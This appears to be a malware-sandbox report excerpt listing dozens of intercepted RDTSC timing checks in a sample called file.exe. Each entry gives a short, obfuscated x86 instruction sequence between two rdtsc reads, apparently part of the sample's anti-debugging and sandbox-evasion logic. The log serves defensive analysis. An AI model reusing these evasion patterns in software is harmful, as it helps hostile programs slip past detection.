                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 609A06 second address: 609A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2398D03469h 0x0000000a jc 00007F2398D0345Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 609A2C second address: 609A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F239852C05Bh 0x0000000d jl 00007F239852C056h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 609A45 second address: 609A49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F180 second address: 60F186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6127B5 second address: 6127B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF717 second address: 5CF790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F239852C06Dh 0x0000000c jmp 00007F239852C067h 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F239852C05Fh 0x00000018 nop 0x00000019 add dword ptr [ebp+122DB8A1h], edx 0x0000001f mov dx, 3C23h 0x00000023 lea eax, dword ptr [ebp+124914E0h] 0x00000029 pushad 0x0000002a push ebx 0x0000002b jl 00007F239852C056h 0x00000031 pop esi 0x00000032 mov esi, dword ptr [ebp+122D37E5h] 0x00000038 popad 0x00000039 mov cl, D4h 0x0000003b nop 0x0000003c push edi 0x0000003d pushad 0x0000003e jmp 00007F239852C05Ch 0x00000043 jmp 00007F239852C05Bh 0x00000048 popad 0x00000049 pop edi 0x0000004a push eax 0x0000004b push ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f pop eax 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF790 second address: 5CF794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF794 second address: 5AA651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 call dword ptr [ebp+122D1CE8h] 0x0000000e pushad 0x0000000f jmp 00007F239852C05Ah 0x00000014 jg 00007F239852C062h 0x0000001a pushad 0x0000001b js 00007F239852C056h 0x00000021 jmp 00007F239852C064h 0x00000026 popad 0x00000027 popad 0x00000028 pushad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CFEA8 second address: 5CFEE3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2398D03456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], esi 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F2398D03458h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push eax 0x00000029 jc 00007F2398D0345Eh 0x0000002f push edi 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D050F second address: 5D0555 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C062h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ecx, edx 0x0000000e push 0000001Eh 0x00000010 mov dword ptr [ebp+122D1BE8h], esi 0x00000016 sub dword ptr [ebp+122D275Eh], edx 0x0000001c nop 0x0000001d jmp 00007F239852C05Dh 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jno 00007F239852C05Ch 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0823 second address: 5D0827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D08C1 second address: 5D08C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D08C5 second address: 5D08CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612BD1 second address: 612BD6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612BD6 second address: 612BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 jmp 00007F2398D03469h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61301C second address: 613020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613020 second address: 61302C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615796 second address: 61579A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61579A second address: 6157C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2398D03456h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F2398D0345Fh 0x00000012 jo 00007F2398D03456h 0x00000018 popad 0x00000019 pop ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6157C3 second address: 6157C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6157C9 second address: 6157DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D0345Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6157DE second address: 6157E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6157E2 second address: 615816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D03469h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2398D03465h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618C5B second address: 618C69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F239852C056h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618C69 second address: 618C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618C6D second address: 618C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C05Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618C7F second address: 618C87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618C87 second address: 618C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 581024 second address: 58105A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 jmp 00007F2398D03466h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2398D0345Eh 0x00000014 jbe 00007F2398D03458h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618409 second address: 618451 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F239852C060h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F239852C05Ch 0x00000011 jbe 00007F239852C056h 0x00000017 pop esi 0x00000018 jmp 00007F239852C05Dh 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 jno 00007F239852C056h 0x00000027 ja 00007F239852C056h 0x0000002d pop eax 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618451 second address: 618464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D0345Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618464 second address: 61846A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6185A0 second address: 6185B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D03461h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6185B5 second address: 6185BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6185BD second address: 6185C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6185C5 second address: 618601 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F239852C056h 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007F239852C056h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007F239852C05Ah 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 jmp 00007F239852C064h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618601 second address: 618621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2398D03467h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618621 second address: 618650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F239852C05Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F239852C061h 0x00000011 je 00007F239852C056h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6187AF second address: 6187BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F2398D03456h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6187BB second address: 6187BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6187BF second address: 6187DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D03463h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61894D second address: 618953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618953 second address: 618957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618957 second address: 618982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C066h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F239852C05Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F6C4 second address: 61F6CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F6CB second address: 61F6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F6D1 second address: 61F6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F2398D03456h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E16F second address: 61E18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F239852C068h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E18D second address: 61E1B8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2398D03456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007F2398D03460h 0x00000011 ja 00007F2398D03458h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push esi 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E495 second address: 61E4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C065h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E5F0 second address: 61E603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2398D0345Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E603 second address: 61E607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D032E second address: 5D0338 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2398D0345Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E8CF second address: 61E8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E8D4 second address: 61E8EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2398D03463h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C2D second address: 622C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C31 second address: 622C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C37 second address: 622C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C3D second address: 622C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2398D0345Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622EBA second address: 622EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622EC0 second address: 622ED2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2398D03456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F2398D0345Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626AB1 second address: 626AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626AB5 second address: 626ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626ABB second address: 626AC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626AC0 second address: 626AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626C35 second address: 626C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F239852C056h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F239852C065h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626C59 second address: 626C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2398D0345Bh 0x0000000f push edi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F2398D0345Ah 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626C7C second address: 626C81 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CBE0 second address: 62CBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CBE4 second address: 62CBFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C05Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F239852C05Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CBFD second address: 62CC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007F2398D0345Ch 0x0000000c jnl 00007F2398D03456h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CC12 second address: 62CC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F239852C056h 0x0000000a popad 0x0000000b jmp 00007F239852C05Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CC2E second address: 62CC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CC32 second address: 62CC36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D4D8 second address: 62D516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F2398D03463h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c jmp 00007F2398D03464h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D516 second address: 62D51A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D818 second address: 62D81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D81F second address: 62D824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D824 second address: 62D82A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62DE15 second address: 62DE65 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F239852C05Ch 0x0000000e jne 00007F239852C056h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007F239852C05Ch 0x0000001d pushad 0x0000001e jmp 00007F239852C060h 0x00000023 jmp 00007F239852C069h 0x00000028 push edx 0x00000029 pop edx 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E68A second address: 62E693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E693 second address: 62E6AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F239852C065h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6343D2 second address: 6343E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63746F second address: 637473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637473 second address: 637479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637479 second address: 637495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C068h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637794 second address: 6377C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D03464h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F2398D03464h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637955 second address: 63796B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C060h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637D9D second address: 637DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D03463h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63800D second address: 638022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C05Dh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638022 second address: 638028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641AD8 second address: 641AEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F239852C056h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641AEA second address: 641AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641AEE second address: 641AF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FB1D second address: 63FB23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
